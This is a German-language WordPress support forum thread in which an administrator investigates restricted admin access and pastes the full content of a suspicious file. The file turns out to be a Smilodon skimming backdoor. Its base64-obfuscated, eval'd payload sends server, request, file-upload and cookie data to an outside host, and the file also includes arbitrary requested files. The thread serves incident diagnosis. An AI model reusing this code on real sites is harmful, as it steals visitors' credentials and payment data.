Website Administration Eingeschränkt (kein access auf Website-Zustands-Bericht)

@michi91

Eine Liste deiner Plugins wäre sicherlich sinnvoll….

Danke für die fixe Antwort von euch beiden.
Die Accounts die dort Access haben, haben Administrativen access
Es sind wirklich nur diese beiden Plugins installiert, zusätzlich zum kürzlich installierten Health Check & Troubleshoot plugin.
Inaktive Plugins gibt es keine, und was ich von der Lady erfahren habe die die Website einrichtet/den Content verwaltet, hat sie auch nichts anderes installiert als das Enfold Theme.

lässt böses vermuten…

Ich bete mal zu allen guten Geistern, dass dies nicht der Fall ist, jedoch bedanke ich mich für den Denkanstoß. Die Möglichkeit habe ich voll außer acht gelassen

Da spricht überhaupt nix gegen… Eine Sicherung vorher schadet nicht, aber solange du nicht irgendwo an Core-Daten rumgefuscht hast, geht das problemlos

Von administrativer Seite wurde definitiv nichts im Backend bzw. an den Core-Daten rumgepfuscht, wir setzen ledigilich das WordPress laut Dokumentation auf mit Apache2 als Webserver und übergeben sie dann zur Einrichtung an diverse Kunden.
Ich gehe davon aus, dass Layer 8 in der Admin-GUI keine Möglichkeit hat an den Backend/Core-Daten rum zu eiern.

@la-geek

Unabhängig davon, vielleicht wurde das letzte WordPress-Update nicht vollständig ausgeführt/übertragen

Dies ist irgendwie meine Hoffnung, jedoch dachte ich mir, dass man das Problem vielleicht ohne neu installation lösen kann.
Jedoch wie du schon sagtest spricht nichts dagegen dies einfach mal zu machen.

was beinhaltet die Datei 01d43b.php?

Der Kollege der sich diese meist ansieht ist im Moment leider nicht verfügbar und ich bin nicht sehr Code affin. Hier der Inhalt:

<?php
if (!defined("SMILODON2_HEAD")) {

    define("SMILODON2_HEAD", 1);

    if (empty($_GET) && empty($_POST)&& empty($_COOKIE))
    {
        // nothing
    }
    else
    {
        $back_connect_p = "aWYgKCFkZWZpbmVkKCduZXdvOGR3cG9qYXA5Mi0wMzJqZzQzJykpIHsNCiAgICBkZWZpbmUoJ25ld284ZHdwb2phcDkyLTAzMmpnNDMnLCAxKTsNCg0KICAgIHsNCiAgICAgICAgew0KICAgICAgICAgICAgaWYgKGVtcHR5KCRfR0VUKSAmJiBlbXB0eSgkX1BPU1QpJiYgZW1wdHkoJF9DT09LSUUpKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIC8vIG5vdGhpbmcNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkdXJsID0gImh0dHA6Ly9haXJmb3JjZWNvZGVzLnNpdGUvd3AtaW5jbHVkZXMvYmxvY2tzL2dyb3VwL2dyd2VxZHJocy5waHAiOw0KICAgICAgICAgICAgICAgICRjb250ZXh0ID0gQXJyYXkoKTsNCiAgICAgICAgICAgICAgICAkY29udGV4dFsnaHR0cCddWydtZXRob2QnXSA9ICdQT1NUJzsNCiAgICAgICAgICAgICAgICAkY29udGV4dFsnaHR0cCddWydoZWFkZXInXSA9ICdDb250ZW50LXR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCc7DQogICAgICAgICAgICAgICAgJGRmX3ZuZHVhc3EgPSBBcnJheSgpOw0KICAgICAgICAgICAgICAgICRkZl92bmR1YXNxWydjMSddID0gImFkbWluX2FqYXgiOw0KICAgICAgICAgICAgICAgICRkZl92bmR1YXNxWydjMiddID0gYmFzZTY0X2VuY29kZShiYXNlNjRfZW5jb2RlKChzZXJpYWxpemUoJF9TRVJWRVIpKSkgLiAiJiYmJiIgLiBiYXNlNjRfZW5jb2RlKHNlcmlhbGl6ZSgkX1JFUVVFU1QpKSAuICImJiYmIiAuIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRfRklMRVMpKSAuICImJiYmIiAuIGJhc2U2NF9lbmNvZGUoc2VyaWFsaXplKCRfQ09PS0lFKSkpOw0KICAgICAgICAgICAgICAgICRjb250ZXh0WydodHRwJ11bJ2NvbnRlbnQnXSA9ICdnMDkzbXBzZGtuZmpkamcyPScgLiBzZXJpYWxpemUoJGRmX3ZuZHVhc3EpOw0KICAgICAgICAgICAgICAgICRjb250ZXh0ID0gc3RyZWFtX2NvbnRleHRfY3JlYXRlKCRjb250ZXh0KTsNCiAgICAgICAgICAgICAgICAkcmVzID0gZmlsZV9nZXRfY29udGVudHMoJHVybCwgRkFMU0UsICRjb250ZXh0KTsNCiAgICAgICAgICAgICAgICBwcmludCAkcmVzOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCn0=";
        eval(base64_decode($back_connect_p));
    }


    if (isset($_SERVER['SCRIPT_URL']))
    {
        $request_file =  ltrim($_SERVER['SCRIPT_URL'], "/");
    }
    else
    {
        $request_file =  ltrim($_SERVER['REQUEST_URI'], "/");

        if (strpos($request_file, "?")!= FALSE)
        {
            $request_file = substr($request_file,0, strpos($request_file, "?"));
        }
    }
    if (file_exists($request_file))
    {

        include($request_file);
    }
    elseif (file_exists("index.php"))
    {

        include("index.php");
    }
    else
    {
        //"Nothing to include";
    }

}

Ich bedanke mich nochmals für eure Antworten, ich werde das letzte Update mal neu installieren und halte euch dann am laufenden.

Vielen lieben Dank,
Der Faugi

@la-geek
Danke nochmal für die schnelle Antwort. Das File existiert leider nicht.
Habe mich jetzt dennoch mal mit dem File auseinandergesetzt und bin zu vermutlich dem problem gekommen.

Smilodon, eine Kreditkarten Skimming software hat sich nun, laut recherce auf WordPress ausgebreitet.
Ich weiß nicht wie happy ihr seid externe Links hier zu sehen:
https://blog.sucuri.net/2022/06/smilodon-credit-card-skimming-malware-shifts-to-wordpress.html

Ich werde mich mal mit dem Problem beschäftigen und mich dann wieder melden.

@la-geek

Aktive Plugins: Redis-Cache + Cloudflare (autom. Updates)

In meinem originalen Beitrag unter Websiten infos

Ich habe das Codesnippet aus dem .php file an einen meiner Kollegen weitergereicht, er hat sich das angeschaut und durch den oben gesandten Link haben wir dann den Schluss gezogen, dass es sich wahrscheinlich um diese Malware handelt. Der denkanstoß von @michi91 hat mich eben auf diese Möglichkeit aufmerksam gemacht.
Im Beitrag von oben fanden wir codesnippets mit ähnlichen Entries, SMILODON2_XYZ in dem Code von mir, SMILODON_EMAIL bzw. _URL etc, aus dem Bericht. Siehe Bild unten, vom Bericht:

Enthält die Kundendomain denn als Bestandteil das airforce

Nein, wir als Firma arbeiten zwar mit einem Aviation-Service zusammen, jedoch hat diese Kundin nicht ansatzweise etwas damit zu tun.

• Diese Antwort wurde vor 9 Monaten von faugi geändert.

@la-geek
Danke nochmal für eure Mühen. Ich werde mir die Links mal anschauen und auch mit meinem Abt. Leiter sprechen was wir damit machen.
Wenn ihr wollt halte ich euch gerne auf dem Laufenden, ansonsten kann ich das Ticket auch voererst mal schließen 🙂